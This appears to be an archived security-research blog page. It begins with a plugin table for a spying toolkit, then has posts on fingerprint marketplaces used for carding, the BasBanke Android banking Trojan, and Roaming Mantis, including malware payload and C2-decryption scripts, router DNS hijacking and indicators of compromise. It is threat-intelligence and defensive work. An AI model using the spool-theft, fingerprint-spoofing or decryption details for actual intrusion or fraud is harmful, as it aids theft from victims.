| 05, 28 | obj32.bin, obj64.bin | Shellcode template used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes. Both versions of “obj32.bin” are the same; it seems to be stored twice by mistake. |
| 29, 30 | sc64.dll, sc32.dll | Utility library. Provides API for cryptography, file, registry, memory management operations and so on. |
| 31, 32 | sg64.dll, sg32.dll | Library for managing the egress queue (files and messages prepared to send to C2). |
| 33, 34 | st64.dll, st32.dll | SuicideWatcher. Watches uninstall time, checks time diff (local time vs internet time). |
| 35, 36 | zip64.dll, zip32.dll | Open source “XZip/XUnzip” library by Info-Zip + Lucian Wischik + Hans Dietrich. Used by the Indexer (inXX.dll) and C2 communication (csXX.dll) plugins. |
| 37, 38 | zlib64.dll, zlib32.dll | Open source “zlib” version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll). |
| 39 | il32.dll | IM-Stealer. Steals conversation content from chat windows of instant messaging applications. |
| 40, 55 | in32.dll, in64.dll | Indexer. Indexes files on victim drives, user profiles, removable drives. Built index files are zipped (by zipXX.dll) and put in the send queue. |
| 41, 56 | isys9core_64.dll, isys9_64.dll | Proprietary “ISYS Search Software” components used by the Indexer plugin. Licensee_ID1 “Q5GXU H5W67 23B4W SCQFD 4G7HV 9GSLW”, Licensee_ID2 “objectviewer.exe”. |
| 45, 54 | sqlite3_64.dll, sqlite3_32.dll | Open source “sqlite” library. Used by “ISYS Search”. |
| 57, 58 | tn32.dll, tn64.dll | Thumbnailer. Makes and prepares to send thumbnails of found picture files. |
| 59, 62 | freeimage_32.dll, freeimageplus_64.dll | FreeImage open source library supporting popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net). Used by the Thumbnailer (tnXX.dll) plugin. |
| 63, 64 | ku64.dll, ku32.dll | Keylogger & clipboard monitor. |
| 65, 66 | pm64.dll, pm32.dll | Steals printed documents from the spooler queue. This is done by enabling the “KeepPrintedJobs” attribute for each configured printer stored in the Windows Registry: key “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers”, value “Attributes”. |
| 67, 68 | rc64.dll, rc32.dll | EgressSender. Sends files from the output queue to C2. |
| 69, 70 | rn64.dll, rn32.dll | Daily “ClientRecon” (ComputerName, OS information, MacAddress, WirelessNetwork keys, connected Apple devices, Apple mobile devices backup list, IE version, SecurityCenterInfo (AV, Firewall and AntiSpyware products), Hardware info, Installed software including Metro Apps, Users, Autoruns). Checks and sends to C2 if something changed. |
| 71, 72 | ss64.dll, ss32.dll | Screenshoter. Periodic low-resolution screenshots. High-resolution screenshots of specified process windows and when recording VoiceIP application audio. See “ss_pr” & “ss_wt_nm” cfg vars. |
| 73, 74 | vm32.dll, vm64.dll | Steals documents from fixed and removable drives. Watches CDBurnArea and steals written CD images. |
| 75, 76 | wc64.dll, wc32.dll | Periodically makes webcam snapshots. |
| 77 | default.cfg | Default configuration settings file. |
| 78 | runin.bin | List of process names and the plugins that should run inside those processes. |
| 79 | morph.dat | Configuration file storing the paths of work folders and registry keys. |
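The pm32/pm64 row describes how the spooler is made to retain printed documents through the “KeepPrintedJobs” printer attribute. As an added example (not code from the original report), the following Python script audits an exported Printers registry hive offline for that flag. The bit value PRINTER_ATTRIBUTE_KEEPPRINTEDJOBS = 0x800 is taken from the Windows SDK header winspool.h; the printer names and values in the sample export are constructed, and the input is assumed to be the output of `reg export` of the Printers key.

```python
import codecs
import re
import sys

# PRINTER_ATTRIBUTE_KEEPPRINTEDJOBS from the Windows SDK (winspool.h). When the
# bit is set, the spooler keeps every printed document instead of deleting it.
PRINTER_ATTRIBUTE_KEEPPRINTEDJOBS = 0x00000800

# Registry key named in the report (relative to HKLM).
PRINTERS_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers"

# Constructed sample of a simplified `reg export` of the Printers key. The printer
# names and values are made up for this example; 0x840 carries the 0x800 bit.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\Office Laser]
"Name"="Office Laser"
"Attributes"=dword:00000040

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\Front Desk MFP]
"Name"="Front Desk MFP"
"Attributes"=dword:00000840
"Priority"=dword:00000001
"""

_KEY_RE = re.compile(r"^\[(.+)\]\s*$")
_DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{1,8})\s*$')


def parse_printer_attributes(reg_text):
    """Return {printer_name: attributes_int} for each printer subkey in a .reg export.

    Only subkeys directly under the Printers key count as printers; deeper
    subkeys such as PrinterDriverData are ignored.
    """
    result = {}
    current = None
    prefix = "\\" + PRINTERS_KEY + "\\"
    for line in reg_text.splitlines():
        key_match = _KEY_RE.match(line)
        if key_match:
            key = key_match.group(1)
            current = None
            idx = key.find(prefix)
            if idx != -1:
                rest = key[idx + len(prefix):]
                if rest and "\\" not in rest:
                    current = rest
            continue
        if current is None:
            continue
        value_match = _DWORD_RE.match(line)
        if value_match and value_match.group("name").lower() == "attributes":
            result[current] = int(value_match.group("hex"), 16)
    return result


def printers_keeping_jobs(reg_text):
    """Sorted names of printers whose Attributes value has the KeepPrintedJobs bit set."""
    attrs = parse_printer_attributes(reg_text)
    return sorted(name for name, value in attrs.items()
                  if value & PRINTER_ATTRIBUTE_KEEPPRINTEDJOBS)


def load_reg_export(path):
    """reg.exe writes UTF-16 LE with a BOM; fall back to UTF-8 for hand-edited files."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    text = load_reg_export(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REG_EXPORT
    flagged = printers_keeping_jobs(text)
    for name in flagged:
        print("KeepPrintedJobs is enabled on printer: %s" % name)
    if not flagged:
        print("No printer keeps printed jobs.")
```

A hit is not proof of compromise (administrators enable the setting for troubleshooting), but an unexplained change of this bit on every configured printer is worth correlating with the other indicators the report lists.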
April 9, 2019

Digital Doppelgangers

Carding has existed for over 20 years, and it is not dead yet. It is alive and, what is more, actively developed by cybercriminals. The “good” old method of entering stolen credit card information into online store forms to buy goods and services, or using online payment system accounts for the same purpose, still works like a charm. Of course, the process has become more sophisticated, and it is certainly not as easy as it was 10 years ago, but unfortunately it is still possible.

Modern financial cyberfraud, sophisticated targeted attacks on banks like Carbanak and Silence, hundreds of families of banking Trojans, etc.: it all started with carding forums many years ago. Carding is the cradle of modern financial cybercrime. As before, bank card, payment system and online banking fraud remain the most lucrative sources of criminal wealth.

A study by Juniper Research estimates that losses from online payment fraud will reach 43 billion USD by 2023, up from 22 billion USD in 2018, making anti-fraud and cybersecurity measures a top concern for the industry. This is not surprising: every day cybercriminals develop new methods and tools to bypass anti-fraud protection systems, write malware to support their activities, create services and stores, and discuss ways to defeat protection mechanisms on Darknet forums and channels. From the famous Cardingplanet forum to Darknet stolen card stores, financial cybercrime schemes never died during all these years. They have evolved and become more dangerous than ever.

Digital fingerprint protection

How do modern anti-fraud systems protect users from online fraud? They employ various models and combinations of multiple technical and analytical methods. But in simple terms, any anti-fraud system must identify a fraudster and block his attempt to accomplish an illegal transaction involving a bank card or payment system account. To identify fraudsters and separate them from legitimate buyers the anti-fraud system uses various mechanisms designed to verify the user’s digital identity mask, and if it knows this mask to be legitimate or the mask is a new and unique one, it will not throw the “red flag”. As a result, the user behind the mask is recognized to be a legitimate one, and his query, such as an attempt to make a purchase using the provided bank card details, will be approved. If the user’s digital identity appears suspicious, the transaction will be canceled or put on hold for an additional manual check. Additional authentication typically includes a request to provide extended information like bank card expiry date or CVV number, or possibly also a verification call from the online store or payment system operator for voice verification.

As such, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device and personal behavioral attributes of the user himself. The first part, the device fingerprint, includes:

  • IP address (external and local)
  • Screen information (screen resolution, window size)
  • Firmware version
  • Operating system version
  • Browser plugins installed
  • Timezone
  • Device ID
  • Battery information
  • Audio system fingerprint
  • GPU info
  • WebRTC IPs
  • TCP/IP fingerprint
  • Passive SSL/TLS analysis
  • Cookies
  • and many more

A device may expose over 100 such attributes while browsing.

The second part of the digital identity is the behavioral analysis. Modern anti-fraud solutions analyze the user’s social network accounts (third-party cookies check) and various aspects of his/her behavior, including:

  • Time spent at online store website
  • Clicks on website location
  • Interest-related behavior (items of interest, typical amount of money spent, digital or real merchandise, etc.)
  • Mouse/touchscreen behavior
  • System configuration changes

The anti-fraud system may “red flag” various tricks, but the main idea is to make sure either that the user’s collected digital identity has been used for transactions before and those transactions were legitimate, or that the digital fingerprint is completely unique and is being used for the first time. This is why, if a cybercriminal uses the same machine for multiple attempts to buy from the same online store using different bank card details or stolen payment system login/password pairs, such illegal transactions will be declined. Anti-fraud systems can also check the user’s collected fingerprint against a local database of fraudster device fingerprint patterns and, if any of them matches the one being used for the online purchase attempt, the transaction will be blocked immediately.
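As an added example (not code from the original article), the following simplified Python decision logic implements the checks described above: device attributes are canonicalised into one fingerprint, matched against a database of fraudster fingerprint patterns, approved when the identity is known-legitimate or brand new, held for extended verification when an unconfirmed device presents a second card, and declined when it cycles through more cards. The attribute names, the card-count threshold and the sample device are constructed for this example.

```python
import hashlib
import json
from dataclasses import dataclass, field

# Device attributes that feed the fingerprint. The names follow the article's
# list; the exact set a real anti-fraud vendor hashes is an assumption here.
FINGERPRINT_FIELDS = (
    "external_ip", "screen", "firmware", "os", "plugins", "timezone",
    "device_id", "gpu", "webrtc_ips", "tcp_fingerprint", "tls_fingerprint",
)


def device_fingerprint(attributes):
    """Canonicalise the selected attributes and hash them into one fingerprint id."""
    selected = {key: attributes.get(key) for key in FINGERPRINT_FIELDS}
    canonical = json.dumps(selected, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


@dataclass
class DeviceHistory:
    cards_seen: set = field(default_factory=set)
    legitimate_transactions: int = 0
    declined_attempts: int = 0


class AntiFraud:
    # A device that has never settled a legitimate purchase and keeps presenting
    # new cards is the "one machine, many stolen cards" pattern from the article.
    # The threshold itself is a constructed value for this example.
    MAX_UNCONFIRMED_CARDS = 2

    def __init__(self, fraud_patterns=()):
        self.history = {}                          # fingerprint -> DeviceHistory
        self.fraud_patterns = set(fraud_patterns)  # known fraudster fingerprints

    def decide(self, attributes, card_token):
        """Return APPROVE, HOLD, DECLINE or BLOCK for one purchase attempt."""
        fp = device_fingerprint(attributes)
        if fp in self.fraud_patterns:
            return "BLOCK"  # matches a stored fraudster device pattern
        hist = self.history.setdefault(fp, DeviceHistory())
        if hist.legitimate_transactions > 0 or not hist.cards_seen:
            # Previously legitimate identity, or a first-time unique fingerprint.
            hist.cards_seen.add(card_token)
            return "APPROVE"
        if card_token in hist.cards_seen:
            # Repeat of a card from a device not yet confirmed legitimate:
            # ask for extended verification (CVV / expiry date, callback).
            return "HOLD"
        if len(hist.cards_seen) >= self.MAX_UNCONFIRMED_CARDS:
            # Unconfirmed device cycling through yet another card: decline and
            # remember the fingerprint so later attempts are blocked outright.
            hist.declined_attempts += 1
            self.fraud_patterns.add(fp)
            return "DECLINE"
        hist.cards_seen.add(card_token)
        return "HOLD"  # second distinct card from an unconfirmed device

    def confirm_legitimate(self, attributes):
        """Merchant feedback: an approved transaction settled without dispute."""
        hist = self.history.setdefault(device_fingerprint(attributes), DeviceHistory())
        hist.legitimate_transactions += 1

    def report_fraud(self, attributes):
        """Chargeback feedback: store this device fingerprint as a fraud pattern."""
        self.fraud_patterns.add(device_fingerprint(attributes))


if __name__ == "__main__":
    # Constructed device attributes; one machine tries four different cards.
    device = {"external_ip": "203.0.113.7", "screen": "1920x1080", "os": "Windows 10",
              "timezone": "Europe/Berlin", "gpu": "Intel UHD 620", "plugins": ["pdf"]}
    engine = AntiFraud()
    for card in ("card-A", "card-B", "card-C", "card-D"):
        print(card, "->", engine.decide(device, card))
```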

Fingerprint example

But the bad guys are always looking for ways to defeat the anti-fraud safeguards. They do in-depth research to find out how anti-fraud systems work, and they analyze browser traffic using local analysis proxy tools to understand the protection systems’ scripts and queries. They study the information gathered from devices to create unique digital fingerprints of their users.

The next thing they do is try to substitute the system’s real fingerprint with the fake one. They try to manipulate queries and supply unique values in response to every query from the anti-fraud mechanism. Or, as a more advanced alternative, they substitute the requested values with the already existing ones – stolen from someone else’s PC.

Genesis Store

Cybercriminals soon became aware that unique fingerprints from users’ PCs make valuable information useful to many of their own kind. They began devising malware to steal fingerprints from users’ machines and selling such fingerprints along with other stolen data from the same machines, including user accounts, logins, passwords and browser cookies collected from various online services – from stores and payment systems to bank accounts. With our cybercrime threat intelligence technologies we were able to identify and analyze the biggest marketplace for this kind of data – the Genesis Store.

Genesis Store is an invitation-only private cybercriminal market for stolen digital fingerprints. At the moment it offers more than 60,000 stolen bot profiles. The profiles include browser fingerprints, website user logins and passwords, cookies and credit card information. The price varies from 5 to 200 dollars per profile and depends heavily on the value of the stolen information. For example, if the bot has a login/password pair for an online bank account, the price is higher. As the marketplace owners have explained in their Darknet forum thread, the price is calculated automatically using a unique algorithm.

Genesis Store homepage

Bots for sale

Genesis Store has a configurable search panel that allows searching for specific bots. Logins and passwords from a particular website, the victim’s country, operating system, date the profile first appeared at the market – everything is searchable.

Genesis search panel

Genesis Store owners want to make the use of stolen profiles as easy as possible, so they have developed a special .crx plugin for Chromium-based browsers. The plugin allows installing stolen digital profiles into the cybercriminal’s own browser with a single mouse click for him to become a doppelganger of the victim. After that the bad guy only needs to connect to a proxy server with an IP address from the victim’s location and he can bypass the anti-fraud systems’ verification mechanisms, pretending to be a legitimate user.

Genesis plugin

Fingerprint settings in Genesis plugin

For the customers who don’t want to buy real fingerprints, there is also an option to generate unique ones. Genesis Store gives its customers an opportunity to use Genesis algorithms and the plugin to generate random fingerprints that can be used, for example, to enter stolen bank card information into online store forms: such unique browser fingerprints will be properly configured, so the anti-fraud system will not be alarmed.

Genesis fingerprint generator

The dark sphere

Another tool widely used to bypass anti-fraud systems is the Tenebris Linken Sphere browser. Its developers position it as the perfect browser for anonymity, and in fact it has been used for carding for years. Unlike the Genesis plugin, Sphere is a fully functional browser with advanced fingerprint configuration capabilities, automatic proxy server validity testing and usage options, etc. It even features a user activity emulator: cybercriminals can program it to open the desired websites, follow links, stay on websites for a given length of time, etc. Simply put, it is designed to trick the anti-fraud systems’ behavior analysis modules. The Tenebris Linken Sphere developers have also created a marketplace of unique fingerprints that can be used with Sphere browsers.

Tenebris website

Unlike Genesis, Sphere uses a subscription-based licensing system. One month of browser usage costs $100. With access to the fingerprint market thrown in, the price is $500 per month.

Tenebris Sphere licenses

Sphere has much deeper configuration options for generated fingerprints. Most of the parameters are fully adjustable, making it possible to create exactly the fingerprint needed to mimic a real user.

Configuration panel

Configuration panel



Anti-fraud systems are developing rapidly. They introduce new protection mechanisms to fend off fraudsters, while fraudsters develop new tools to break through the protection layers. The sums of money lost to carding attacks are huge, and cybercriminals are certain to scale up these malicious activities.

The security departments of financial organizations must always look for ways to counter such threats. Extra two-factor authentication for any transaction initiated using a bank card or payment system is an absolute necessity these days, even if the user’s digital profile appears legit to the protection system. Even though it is not very convenient for users to complete the extra authentication routine each time they want to buy online, it is the most effective safeguard against carding attacks for the present.

In addition, new user behavior analysis methods must be developed and implemented together with custom fingerprinting technologies that may include hardware-based fingerprint collection arrangements operating on a deeper level than currently available. Additional biometric authentication should be considered as well.

Kaspersky Lab continuously researches financial cybercrime to provide timely protection against the hostile activities.

April 4, 2019

BasBanke: Trend-setting Brazilian banking Trojan

BasBanke is a new Android malware family targeting Brazilian users. It is a banking Trojan built to steal financial data such as credentials and credit/debit card numbers, but it is not limited to this functionality. The propagation of this threat began during the 2018 Brazilian elections, registering over 10,000 installations by April 2019 from the official Google Play Store alone.

This malware can perform tasks such as keystroke logging, screen recording, SMS interception, and the theft of credit card and financial information. To trick users into downloading the malware, the authors advertise it via Facebook and WhatsApp messages. The campaign’s URLs redirect victims either to the official Google Play Store or to a website hosting malicious APK packages.

Malicious applications used to distribute BasBanke, hosted in the Google Play Store.

The malicious applications hosted in Google Play Store disguise themselves as applications with supposed functionality such as a secure QR reader, a fake app for a real travel agency with travel deals, and – implementing a well-known trick – as an application to “see who visited your profile.” The most widespread malicious application is a fake version of CleanDroid, first announced in a paid advertisement on Facebook, and linking to the application hosted on the Play Store. This “miraculous” application promises to protect the victim’s device against viruses, to optimize memory space, and to save data when using a 3G or 4G connection. In reality it is a banking Trojan.

The malicious CleanDroid application shown in a Facebook advertisement. Source: Defesa Digital

The number of targeted banking applications and websites is quite significant. A considerable number of Brazilian financial institutions and other popular websites such as Spotify, YouTube and Netflix are on the target list. When it comes to stealing banking credentials, metadata such as the device name, IMEI and the telephone number used by the victim is also sent to a remote C2. Why pay special attention to this data? Fraudsters need it to mimic legitimate access to the victim’s account.

Metadata extracted from the phone and sent to the remote C2.

Depending on the version of the malware, we found different targets – and they are all financial institutions. In addition, an extensive list of keywords defines what other brands or websites will trigger the keylogging procedure.

We have previously found a few malicious campaigns similar to this one, but with significantly smaller distribution than BasBanke. Another difference is that BasBanke uses Facebook and WhatsApp as a mass distribution vector. It also appears to have sparked new ideas among Brazilian cybercriminal crews by showing how easy it is to infect an Android device with a malicious application hosted in the official store. The attackers behind BasBanke have proved that the Play Protect feature is not enough to stop them and effectively block their malware. In fact, BasBanke is the forerunner of a larger malicious campaign that we’ll be reporting on soon.

Reference IoC



Interested in more information? Email us at financialintel@kaspersky.com

April 3, 2019

Roaming Mantis, part IV

One year has passed since we published the first blogpost about the Roaming Mantis campaign on securelist.com, and this February we detected new activities by the group. This blogpost is a follow-up to our earlier reporting about the group, with updates on their tools and tactics.

Mobile config for Apple phishing

Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, she sees pop-up messages guiding her to the malicious iOS mobile config installation:

Pop-up messages and mobile config installation

After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

XML and CA in mobile config

The CA contains the suspected developer’s email address, “zeeyf79797@yahoo.co[.]jp”, which could be malicious.

We created a test account for this research and used the account credentials at the phishing site. As soon as the threat actor received the ID and password, the criminals attempted to log in to the account from Hong Kong. After entering the credentials, we were directed to the next page, which tried to steal the two-factor authentication code (PIN) sent to the device.

Phishing page for stealing the Apple ID credentials and the two-factor authentication code

Re-spreading the updated sagawa.apk Type A (MoqHao/XLoader)

On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.

sagawa.apk Type A has spread since Feb 26

We have analyzed the malicious APK file and confirmed that it is definitely a variant of the sagawa.apk Type A malware, also known as MoqHao (McAfee) and XLoader (TrendMicro). Type A malware was earlier distributed via SMS in Japan.

We also found out that the threat actors had compromised routers to overwrite DNS settings and discovered that the following two features were updated as well:

  • Decryption algorithm for encrypted payload in Trojan-Dropper module
  • Stored destination and accounts for getting real C2

Decryption algorithm for encrypted payload in Trojan-Dropper module

Compared to the previous version, the Trojan-Dropper’s decryption function has been altered slightly (change highlighted in purple):

Added 4-byte skip from encrypted data in decompiled code

Why did the attackers change it? Well, the simplified Python script for extracting the encrypted payload was disclosed in our previous blog posts. We suspect that the actor took this into account and introduced minor changes to their decryption algorithm to evade detection by security products and researchers.

However, we have updated the simplified Python script according to this change:

sagawa.apk_typeA_payload_extractor_1.01.py

```python
#!/usr/bin/env python
import sys
import zlib
import base64

# Read the encrypted payload extracted from the Trojan-Dropper APK.
data = open(sys.argv[1], "rb").read()

# New in this version: the dropper skips the first 4 bytes before inflating
# (the decompiled code calls open.skip(4)), so the script does the same.
dec_z = zlib.decompress(data[4:])

# The inflated data is a base64 string; decode it to get the real payload.
dec_b = base64.b64decode(dec_z)

with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec_b)
```

Stored destination and accounts for getting real C2

In the previous campaign, the three accounts “haoxingfu11”, “haoxingfu22” and “haoxingfu33” on @outlook.com were stored inside the samples for the purpose of retrieving the C2 server address. To fetch the C2 server address, the email service was used: the real C2 destination was delivered to the victims in encrypted form in the email subject. In the new version the actor has switched tactics, retrieving the C2 address from Twitter instead of the email service.

    “https://twitter.com/%s” is stored in the malware

    The three suspected Twitter accounts were easily found as well, because the sample had the account IDs stored together, separated by the “|” character just like the old samples:

    Three account IDs separated by the “|” character

    The decryption algorithm for the real C2 address remained untouched – the malware connects to the extracted real C2 via web socket. In addition to the three accounts mentioned earlier, we found several other accounts:

    • lucky88755
    • lucky98745
    • lucky876543
    • gyugyu87418490
    • luckyone1232
    • sadwqewqeqw

    The decryption algorithm for extracting the real C2 from Chinese characters is the same as in the previous sample, so our scripts from the old blogpost will still work. All the accounts are related to the same IP, although the port numbers are different. The table below shows these changes as derived from the account “@luckyone1232”.

| Datetime (UTC) | Encrypted data | Decrypted real C2 |
|---|---|---|
| February 25 2019 11:30 | 傘傠傘偠傈傠偠傠傐傸偘储傀傐僨傀僨僸傸傀 | 114.43.155[.]227:28855 |
| February 26 2019 08:00 | 傀傸傸偠傠傠傠偘傘储偘傰傠僠僨傀僨僸傸傀 | 220.136.47[.]169:28855 |
| March 02 2019 01:00 | 傀傸傸偠傠傠傠偘傘僘偘傰傈傐僨傀僨僸傸傀 | 220.136.49[.]137:28855 |
| March 05 2019 06:00 | 傀傸傸偠傠傠傠偘傠僘偘傰僀傸僸僐傀傐 | 220.136.39[.]1:28855 |
| March 07 2019 03:00 | 傘傠僸偠傠傈僐偘傰傈储偈傀傰傈僀傸僸僐傀傐 | 118.168.130[.]236:28855 |
| March 09 2019 10:00 | 傠傠偈傀傰傸偠傸傰傐偘储傀僨僨傀僨僸傸傀 | 61.230.210[.]228:28855 |
| March 13 2019 01:00 | 傘傸傐偠傸储储偘傰储傈偈傈傀僨傀僨僸傸傀 | 125.227.174[.]35:28855 |
| March 21 2019 01:00 | 傘偘傰傠僠偈傀储傠偠傈僸僀傸僸僐傀傐 | 1.169.203[.]48:28855 |
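As an added example (this is not Kaspersky's extractor script and not code from the malware), the following Python 3 module reproduces both Type A decryption steps described in this post: extracting the payload from the dropper asset, covering both the old format and the new 4-byte skip by trying offset 0 first and offset 4 second, and decoding the real C2 address from the CJK-character string exactly as the one-line algorithm above does. The asset bytes in the self-test are constructed; the real 4-byte prefix is not given in the post, so a placeholder that is deliberately not a valid zlib header stands in for it.

```python
#!/usr/bin/env python3
# Added example, not Kaspersky's extractor and not code from the malware.
# Reproduces the two sagawa.apk Type A decryption steps described above.
import base64
import zlib

C2_XOR_KEY = "beg"   # three-byte XOR key used in the blog's C2 decoder
CJK_BASE = 0x4E00    # start of the CJK Unified Ideographs block


def extract_payload(enc_data):
    """Decrypt a Trojan-Dropper asset (\\assets\\a or \\assets\\bin).

    Old format: zlib(base64(payload)). March 2019 format: the same data
    behind a 4-byte prefix. Offset 0 is tried first and offset 4 second,
    so one function serves both versions. Returns (skip_used, payload).
    """
    last_err = None
    for skip in (0, 4):
        try:
            dec_z = zlib.decompress(enc_data[skip:])
            return skip, base64.b64decode(dec_z)
        except (zlib.error, ValueError) as err:  # binascii.Error is a ValueError
            last_err = err
    raise ValueError("not a Type A encrypted asset: %s" % last_err)


def decrypt_real_c2(ext):
    """Decode the real C2 (ip:port) hidden in CJK characters, as published
    in the attacker-controlled Twitter profile.

    Python precedence makes the blog's one-liner evaluate as
    ((code_point - 0x4e00) >> 3) ^ key_byte; that is written out here.
    """
    dec = ""
    for i, ch in enumerate(ext):
        dec += chr(((ord(ch) - CJK_BASE) >> 3) ^ ord(C2_XOR_KEY[i % 3]))
    return dec


def defang(addr):
    """Render an address the way the post does: 114.43.155[.]227:28855."""
    host, sep, port = addr.rpartition(":")
    if not sep:
        host, port = addr, ""
    i = host.rfind(".")
    if i >= 0:
        host = host[:i] + "[.]" + host[i + 1:]
    return host + (":" + port if port else "")


def make_test_asset(payload, skip):
    """Constructed test data only: build an asset the way the dropper
    stores it. The real 4-byte prefix is not given in the post; 0xDEADBEEF
    is a placeholder chosen because it is not a valid zlib header."""
    return b"\xde\xad\xbe\xef"[:skip] + zlib.compress(base64.b64encode(payload))


if __name__ == "__main__":
    # Row 1 of the table above decodes back to the published address.
    print(defang(decrypt_real_c2("傘傠傘偠傈傠偠傠傐傸偘储傀傐僨傀僨僸傸傀")))
    for skip in (0, 4):
        print(extract_payload(make_test_asset(b"dex\n035\x00", skip)))
```

The same `decrypt_real_c2` function can be run over every row of the table above; trying offset 0 before offset 4 in `extract_payload` means an analyst does not need to know in advance which version of the dropper a sample belongs to.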

We also noticed that the threat actor has introduced a new backdoor command, “getPhoneState”. The following table compares the older and newer versions of the malware:

| Date | August 08 2018 | March 03 2019 |
|---|---|---|
| MD5 | 956f32a28d0057805c7234d6a13aa99b | 651b6888b3f419fc1aac535921535324 |
| File size | 427.3 KB (437556 bytes) | 396.0 KB (405504 bytes) |
| Malware type | sagawa.apk Type A, MoqHao (McAfee), XLoader (TrendMicro) | sagawa.apk Type A, MoqHao (McAfee), XLoader (TrendMicro) |
| Encrypted payload (enc_data) | \assets\a | \assets\bin |
| Decryption algorithm for payload | payload = base64.b64decode(zlib.decompress(enc_data)); | payload = base64.b64decode(zlib.decompress(enc_data[4:])); |
| Backdoor commands | sendSms, ping | sendSms, getPhoneState |
| Stored destination | @outlook.com (email) | https://twitter.com/%s (SNS) |
| Accounts | haoxingfu11, haoxingfu33 | luckyone1232, gyugyu87418490 |
| RegExp | abcd | <title>abcd([\\u4e00-\\u9fa5]+?) “; |
| Decryption algorithm for real C2 | for i in range(len(ext)): dec = dec + chr((ord(ext[i]) - 0x4e00) >> 3 ^ ord('beg'[j])); j = (j+1) % 3 | for i in range(len(ext)): dec = dec + chr((ord(ext[i]) - 0x4e00) >> 3 ^ ord('beg'[j])); j = (j+1) % 3 |

Rogue DNS settings in compromised routers again

In late February 2019, we detected a URL query of a malicious DNS changer. Here is an example:

URL query of malicious DNS changer

The router’s DNS settings are potentially compromised if a device on the local network loads the DNS changer’s URL query and the router meets the following conditions:

  1. No authentication for the router panel from the local network
  2. The device has an admin session for the router panel
  3. Simple (or default) ID and password for the router panel, like admin:admin

As we have observed, several hundred routers have been compromised and all pointed to the rogue DNS IPs.

This code writes the rogue DNS IPs below into the DNS settings of the routers:

  • 171.244.33[.]114
  • 171.244.33[.]116

Geographical expansion

According to our KSN detection data for the period from February 25, 2019 to March 20, 2019, new variants of sagawa.apk Type A (Trojan-Dropper.AndroidOS.Wroba.g) have been detected in the wild.

Geographical expansion from KSN data

The worst affected countries are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. Our products detected this malware over 6,800 times for over 950 unique users during this period. We believe this attack wave has a much bigger scale and these numbers reflect only a small part of this campaign.


We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used. We find the use of malicious mobile config especially alarming as this may cause serious problems for the users. As explained in an earlier blog post, “the profile could configure the device to use a malicious proxy or VPN, effectively allowing the attacker to monitor everything.”

We recommend users take the following steps:

  • Change the default ID and password, and apply the relevant security patches to counter these threats;
  • For Android users: do not download APKs from third-party sources;
  • For iOS users: do not install a non-trusted third-party mobile config.

For further information about this threat actor, please refer to our previous blog posts about Roaming Mantis:

Kaspersky Lab products detect this malware for Android as:

  • HEUR:Trojan-Banker.AndroidOS.Wroba
  • HEUR:Trojan-Dropper.AndroidOS.Wroba

Finally, we would like to show our appreciation to the Japanese researchers @ninoseki and @papa_anniekey, who have shared and discussed with us the results of their Roaming Mantis campaign research. The criminals are still rapidly improving their methods: we discovered an updated sagawa.apk Type A this April, and the fresh sample embeds a DES algorithm in place of the earlier decryption routine. We will keep tracking Roaming Mantis activity and publish any new findings in the future.

Indicators of compromise (IoCs) examples

Malicious hosts:

  • 114.43.155[.]227 (real C2)
  • 220.136.47[.]169 (real C2)
  • 220.136.49[.]137 (real C2)
  • 220.136.39[.]1 (real C2)
  • 118.168.130[.]236 (real C2)
  • 171.244.33[.]114 (RogueDNS)
  • 171.244.33[.]116 (RogueDNS)
  • 61.230.153[.]211 (Landing page)
  • 154.223.62[.]130 (Landing page)
  • ffakecg[.]com (Landing page)
  • sagawa-mwm[.]com (Landing page)
  • sagawa-mqd[.]com (Landing page)
  • sagawa-bz[.]com (Landing page)
  • nttdocomo-qae[.]com (Landing page)
  • nttdocomo-qat[.]com (Landing page)

Suspicious Twitter accounts:
  • luckyone1232
  • sadwqewqeqw
  • gyugyu87418490
  • lucky88755
  • lucky98745
  • lucky876543

sagawa.apk Type A and its modules:

  • 417a6af1172042986f602cc0e2e681dc (APK file)
  • 651b6888b3f419fc1aac535921535324 (APK file)
  • 0a4e8d3fe5ee383ba3a22d0f00670ce3 (APK file)
  • 870697ddb36a8f205478c2338d7e6bc7 (APK file)
  • 7e247800b95c643a3c9d4a320b12726b (\classes.dex)
  • 7cfb9ed812e0250bfcb4022c567771ec (\classes.dex)
  • 8358d2a39d412edbd1cf662e0d8a9f19 (\classes.dex)
  • 7cfb9ed812e0250bfcb4022c567771ec (\classes.dex)
  • af2890a472b85d473faee501337564a9 (Decrypted dex file)
  • c8d7475a27fb7d669ec3787fe3e9c031 (Decrypted dex file)
  • d0848d71a14e0f07c6e64bf84c30ee39 (Decrypted dex file)
  • e2b557721902bc97382d268f1785e085 (Decrypted dex file)
April 3, 2019

